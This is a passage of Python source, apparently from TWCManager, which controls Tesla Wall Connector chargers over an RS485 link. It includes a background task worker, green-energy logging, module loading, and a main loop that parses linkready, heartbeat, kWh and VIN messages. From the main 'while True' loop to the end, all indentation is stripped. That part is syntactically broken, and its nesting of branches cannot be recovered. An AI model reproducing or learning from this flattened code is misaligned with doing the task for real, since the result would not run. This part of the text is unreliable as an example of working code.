    carapi = master.getModuleByName("TeslaAPI")

    while True:
        try:
            task = master.getBackgroundTask()

            if "cmd" in task:
                if task["cmd"] == "applyChargeLimit":
                    carapi.applyChargeLimit(limit=task["limit"])
                elif task["cmd"] == "charge":
                    # car_api_charge does nothing if it's been under 60 secs since it
                    # was last used so we shouldn't have to worry about calling this
                    # too frequently.
                    carapi.car_api_charge(task["charge"])
                elif task["cmd"] == "carApiEmailPassword":
                    carapi.resetCarApiLastErrorTime()
                    carapi.car_api_available(task["email"], task["password"])
                elif task["cmd"] == "checkArrival":
                    # lastChargeLimitApplied == 0 means no limit was applied yet;
                    # -1 asks applyChargeLimit to fall back to its default.
                    limit = (
                        carapi.lastChargeLimitApplied
                        if carapi.lastChargeLimitApplied != 0
                        else -1
                    )
                    carapi.applyChargeLimit(limit=limit, checkArrival=True)
                elif task["cmd"] == "checkCharge":
                    carapi.updateChargeAtHome()
                elif task["cmd"] == "checkDeparture":
                    carapi.applyChargeLimit(
                        limit=carapi.lastChargeLimitApplied, checkDeparture=True
                    )
                elif task["cmd"] == "checkGreenEnergy":
                    check_green_energy()
                elif task["cmd"] == "checkVINEntitlement":
                    # The two possible arguments are task["subTWC"] which tells us
                    # which TWC to check, or task["vin"] which tells us which VIN
                    if task.get("vin", None):
                        task["subTWC"] = master.getTWCbyVIN(task["vin"])

                    if task["subTWC"]:
                        if master.checkVINEntitlement(task["subTWC"]):
                            logger.info(
                                "Vehicle %s on TWC %02X%02X is permitted to charge."
                                % (
                                    task["subTWC"].currentVIN,
                                    task["subTWC"].TWCID[0],
                                    task["subTWC"].TWCID[1],
                                )
                            )
                        else:
                            logger.info(
                                "Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session."
                                % (
                                    task["subTWC"].currentVIN,
                                    task["subTWC"].TWCID[0],
                                    task["subTWC"].TWCID[1],
                                )
                            )
                            master.sendStopCommand(task["subTWC"].TWCID)
                elif task["cmd"] == "getLifetimekWh":
                    master.getSlaveLifetimekWh()
                elif task["cmd"] == "getVehicleVIN":
                    master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
                elif task["cmd"] == "snapHistoryData":
                    master.snapHistoryData()
                elif task["cmd"] == "updateStatus":
                    update_statuses()
                elif task["cmd"] == "webhook":
                    if config["config"].get("webhookMethod", "POST") == "GET":
                        requests.get(task["url"])
                    else:
                        body = master.getStatus()
                        requests.post(task["url"], json=body)
                elif task["cmd"] == "saveSettings":
                    master.saveSettings()

        # Catch Exception rather than using a bare except so SystemExit and
        # KeyboardInterrupt can still unwind this thread; a failed task must
        # not kill the worker loop.
        except Exception:
            logger.info(
                "%s: "
                + traceback.format_exc()
                + ", occurred when processing background task",
                "BackgroundError",
                extra={"colored": "red"},
            )

        # task_done() must be called to let the queue know the task is finished.
        # backgroundTasksQueue.join() can then be used to block until all tasks
        # in the queue are done.
        # NOTE(review): if getBackgroundTask() itself raised, `task` may be
        # unbound here — confirm the queue implementation cannot raise.
        master.doneBackgroundTask(task)
def check_green_energy():
    """Poll every EMS module for fresh readings and, when the active policy
    is a green one, recompute the amps offered to slave TWCs."""
    global config, hass, master

    # Check solar panel generation using an API exposed by
    # the HomeAssistant API.
    #
    # You may need to customize the sensor entity_id values
    # to match those used in your environment. This is configured
    # in the config section at the top of this file.
    #
    # Poll all loaded EMS modules for consumption and generation values
    for ems in master.getModulesByType("EMS"):
        ems_name = ems["name"]
        ems_ref = ems["ref"]
        master.setConsumption(ems_name, ems_ref.getConsumption())
        master.setGeneration(ems_name, ems_ref.getGeneration())

    # Set max amps iff charge_amps isn't specified on the policy.
    if master.getModuleByName("Policy").policyIsGreen():
        master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
    """Log the current charging limit and, for green policies, the
    generation/consumption breakdown; then push min/max amp values to all
    Status modules."""

    # Print a status update if we are tracking green energy, showing the
    # generation and consumption figures
    maxamps = master.getMaxAmpsToDivideAmongSlaves()
    maxampsDisplay = f("{maxamps:.2f}A")
    if master.getModuleByName("Policy").policyIsGreen():
        genwatts = master.getGeneration()
        conwatts = master.getConsumption()
        conoffset = master.getConsumptionOffset()
        chgwatts = master.getChargerLoad()
        othwatts = 0

        # "Other" (non-charger) load = consumption minus charger load, further
        # reduced by any positive consumption offset.
        if config["config"]["subtractChargerLoad"]:
            if conwatts > 0:
                othwatts = conwatts - chgwatts
            if conoffset > 0:
                othwatts -= conoffset

        # Extra parameters to send with logs
        logExtra = {
            "logtype": "green_energy",
            "genWatts": genwatts,
            "conWatts": conwatts,
            "chgWatts": chgwatts,
            "colored": "magenta",
        }

        # One log line per combination of offset/other-load being present.
        # NOTE(review): othwatts == 0 with a non-zero conoffset matches none of
        # these branches and logs nothing here — confirm this is intentional.
        if (genwatts or conwatts) and (not conoffset and not othwatts):
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s)",
                f("{genwatts:.0f}W"),
                f("{conwatts:.0f}W"),
                f("{chgwatts:.0f}W"),
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and not conoffset:
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
                f("{genwatts:.0f}W"),
                f("{conwatts:.0f}W"),
                f("{chgwatts:.0f}W"),
                f("{othwatts:.0f}W"),
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and conoffset > 0:
            logger.info(
                "Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
                f("{genwatts:.0f}W"),
                f("{conwatts:.0f}W"),
                f("{chgwatts:.0f}W"),
                f("{othwatts:.0f}W"),
                f("{conoffset:.0f}W"),
                extra=logExtra,
            )
        elif (genwatts or conwatts) and othwatts and conoffset < 0:
            logger.info(
                "Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
                f("{genwatts:.0f}W"),
                f("{(-1 * conoffset):.0f}W"),
                f("{conwatts:.0f}W"),
                f("{chgwatts:.0f}W"),
                f("{othwatts:.0f}W"),
                extra=logExtra,
            )

        # The "nominal" offer is what the raw generation/consumption figures
        # would suggest; the actual maxamps may differ (e.g. policy clamping).
        nominalOffer = master.convertWattsToAmps(
            genwatts
            + (
                chgwatts
                if (config["config"]["subtractChargerLoad"] and conwatts == 0)
                else 0
            )
            - (
                conwatts
                - (
                    chgwatts
                    if (config["config"]["subtractChargerLoad"] and conwatts > 0)
                    else 0
                )
            )
        )
        if abs(maxamps - nominalOffer) > 0.005:
            nominalOfferDisplay = f("{nominalOffer:.2f}A")
            logger.debug(
                f(
                    "Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
                )
            )
            # Back-compute consumption so the summary line below adds up.
            conwatts = genwatts - master.convertAmpsToWatts(maxamps)
        generation = f("{master.convertWattsToAmps(genwatts):.2f}A")
        consumption = f("{master.convertWattsToAmps(conwatts):.2f}A")
        logger.info(
            "Limiting charging to %s - %s = %s.",
            generation,
            consumption,
            maxampsDisplay,
            extra={"colored": "magenta"},
        )
    else:
        # For all other modes, simply show the Amps to charge at
        logger.info(
            "Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
        )

    # Print minimum charge for all charging policies
    minchg = f("{config['config']['minAmpsPerTWC']}A")
    logger.info(
        "Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
    )

    # Update Sensors with min/max amp values
    for module in master.getModulesByType("Status"):
        module["ref"].setStatus(
            bytes("config", "UTF-8"),
            "min_amps_per_twc",
            "minAmpsPerTWC",
            config["config"]["minAmpsPerTWC"],
            "A",
        )
        module["ref"].setStatus(
            bytes("all", "UTF-8"),
            "max_amps_for_slaves",
            "maxAmpsForSlaves",
            master.getMaxAmpsToDivideAmongSlaves(),
            "A",
        )
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
data = ""  # most recent byte read from the RS485 interface
dataLen = 0  # buffer length reported by the interface module
ignoredData = bytearray()  # noise bytes seen between messages (shown in debug logs)
msg = bytearray()  # message currently being assembled from the wire
msgLen = 0  # number of bytes accumulated in msg so far
numInitMsgsToSend = 10  # 5x linkready1 + 5x linkready2 are sent at startup
msgRxCount = 0  # count of complete messages received
idxSlaveToSendNextHeartbeat = 0  # round-robin index into the slave TWC list
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)

# Instantiate all modules in the modules_available list automatically.
# Entries are "Type.ClassName"; the class is looked up inside the
# TWCManager.<Type>.<ClassName> module and registered with master.
for module in modules_available:
    modulename = []
    if str(module).find(".") != -1:
        modulename = str(module).split(".")

    try:
        # Pre-emptively skip modules that we know are not configured
        configlocation = master.translateModuleNameToConfig(modulename)
        if (
            not config.get(configlocation[0], {})
            .get(configlocation[1], {})
            .get("enabled", 1)
        ):
            # We can see that this module is explicitly disabled in config, skip it
            continue

        moduleref = importlib.import_module("TWCManager." + module)
        modclassref = getattr(moduleref, modulename[1])
        modinstance = modclassref(master)

        # Register the new module with master class, so every other module can
        # interact with it
        master.registerModule(
            {"name": modulename[1], "ref": modinstance, "type": modulename[0]}
        )
    # ModuleNotFoundError is a subclass of ImportError, so it must be caught
    # first — the original order made this branch unreachable and routed
    # missing optional modules through logger.error instead of logger.info.
    except ModuleNotFoundError as e:
        logger.info(
            "%s: " + str(e) + ", when importing %s, not using %s",
            "ModuleNotFoundError",
            module,
            module,
            extra={"colored": "red"},
        )
    except ImportError as e:
        logger.error(
            "%s: " + str(e) + ", when importing %s, not using %s",
            "ImportError",
            module,
            module,
            extra={"colored": "red"},
        )
# Load settings from file
master.loadSettings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
# daemon=True lets the interpreter exit without waiting for this thread.
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
# Announce startup mode (fake master vs fake slave), our fake TWCID and sign.
logger.info(
    "TWC Manager starting as fake %s with id %02X%02X and sign %02X"
    % (
        ("Master" if config["config"]["fakeMaster"] else "Slave"),
        ord(fakeTWCID[0:1]),
        ord(fakeTWCID[1:2]),
        ord(master.getSlaveSign()),
    )
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur."
% (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
# Update the timestamp of the last reciept of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
